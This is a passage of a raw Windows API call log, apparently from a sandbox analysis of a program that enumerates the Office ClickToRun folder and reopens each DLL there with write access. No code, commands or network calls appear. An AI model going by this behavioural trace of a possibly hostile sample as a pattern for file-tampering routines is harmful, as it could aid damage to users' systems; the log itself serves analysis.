Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvApi.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvApi.dll", lpUsedDefaultChar=0x0) returned 73 [0075.723] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0075.723] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.723] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.723] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0075.723] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0075.723] AreFileApisANSI () returned 1 [0075.723] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0075.723] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85580 [0075.723] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x85580, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvApi.dll") returned 73 [0075.723] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvApi.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvapi.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0075.723] GetFileType (hFile=0x430) returned 0x1 [0075.723] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85580 | out: hHeap=0x20000) returned 1 [0075.723] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0075.723] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0075.724] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0075.724] CloseHandle (hObject=0x430) returned 1 [0075.724] AreFileApisANSI () returned 1 [0075.724] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0075.724] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85ee0 [0075.724] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x85ee0, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvApi.dll") returned 73 [0075.724] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvApi.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvapi.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0075.724] GetLastError () returned 0x20 [0075.724] GetLastError () returned 0x20 [0075.724] SetLastError (dwErrCode=0x20) [0075.724] GetLastError () returned 0x20 [0075.724] SetLastError (dwErrCode=0x20) [0075.724] GetLastError () returned 0x20 [0075.724] SetLastError (dwErrCode=0x20) [0075.724] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85ee0 | out: hHeap=0x20000) returned 1 [0075.724] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0075.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0075.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0075.725] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.725] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.725] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a7f55d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a7f55d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe1b7300, ftLastWriteTime.dwHighDateTime=0x1d0d7a5, nFileSizeHigh=0x0, nFileSizeLow=0x60ea0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AppvIsvStream32.dll", cAlternateFileName="APPVIS~2.DLL")) returned 1 [0075.725] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0075.725] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0075.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0075.725] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0075.725] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0075.725] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0075.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0075.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0075.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0075.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0075.725] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0075.725] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0075.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0075.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0075.725] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0075.725] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0075.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0075.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0075.725] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0075.725] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0075.725] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0075.725] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0075.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0075.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0075.725] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0075.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0075.725] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.725] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.725] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.726] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.726] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0075.726] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0075.726] AreFileApisANSI () returned 1 [0075.726] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream32.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream32.dll", lpUsedDefaultChar=0x0) returned 78 [0075.726] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d0b0 [0075.726] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.726] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.726] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0075.726] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0075.726] AreFileApisANSI () returned 1 [0075.726] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 78 [0075.726] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9c) returned 0x2e430 [0075.726] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x2e430, cchWideChar=78 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream32.dll") returned 78 [0075.726] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0075.727] GetFileType (hFile=0x430) returned 0x1 [0075.727] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0075.727] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0075.727] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0075.727] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0075.727] CloseHandle (hObject=0x430) returned 1 [0075.728] AreFileApisANSI () returned 1 [0075.728] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 78 [0075.728] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9c) returned 0x2e430 [0075.728] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x2e430, cchWideChar=78 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream32.dll") returned 78 [0075.728] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream32.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0075.728] GetFileType (hFile=0x430) returned 0x1 [0075.728] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0075.728] CloseHandle (hObject=0x430) returned 1 [0075.728] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0075.728] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0075.728] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0075.728] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0075.728] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0075.728] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0075.728] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0075.728] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0075.728] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0075.728] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0075.728] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0075.728] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0075.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0075.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0075.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0075.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0075.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0075.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0075.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0075.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0075.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0075.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0075.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0075.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0075.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0075.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0075.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0075.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0075.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0075.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0075.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0075.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0075.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0075.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0075.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0075.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0075.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0075.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0075.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0075.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0075.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0075.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0075.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0075.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0075.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0075.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0075.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0075.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0075.730] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0075.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0075.730] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0075.730] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0075.730] AreFileApisANSI () returned 1 [0075.730] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 78 [0075.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9c) returned 0x2e430 [0075.730] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x2e430, cchWideChar=78 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream32.dll") returned 78 [0075.730] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream32.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a7f55d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a7f55d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe1b7300, ftLastWriteTime.dwHighDateTime=0x1d0d7a5, nFileSizeHigh=0x0, nFileSizeLow=0x60ea0)) returned 1 [0075.730] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0075.730] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0075.730] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0075.730] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d0b0 | out: hHeap=0x20000) returned 1 [0075.730] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.730] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.730] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a7f55d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a7f55d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xb5e67000, ftLastWriteTime.dwHighDateTime=0x1d0d7a8, nFileSizeHigh=0x0, nFileSizeLow=0x73aa0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AppvIsvStream64.dll", cAlternateFileName="APPVIS~3.DLL")) returned 1 [0075.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0075.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0075.730] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0075.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0075.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0075.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0075.730] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0075.730] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0075.730] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0075.730] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0075.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0075.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0075.730] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0075.730] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0075.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0075.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0075.730] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0075.730] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0075.731] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0075.731] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e580 [0075.731] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0075.731] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0075.731] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e580 | out: hHeap=0x20000) returned 1 [0075.731] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0075.731] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0075.731] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0075.731] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.731] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.731] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.731] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.731] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0075.731] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0075.731] AreFileApisANSI () returned 1 [0075.731] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream64.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream64.dll", lpUsedDefaultChar=0x0) returned 78 [0075.731] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd98 [0075.731] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.731] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.731] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0075.731] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0075.731] AreFileApisANSI () returned 1 [0075.731] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 78 [0075.731] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9c) returned 0x2e430 [0075.731] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x2e430, cchWideChar=78 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream64.dll") returned 78 [0075.731] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream64.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, 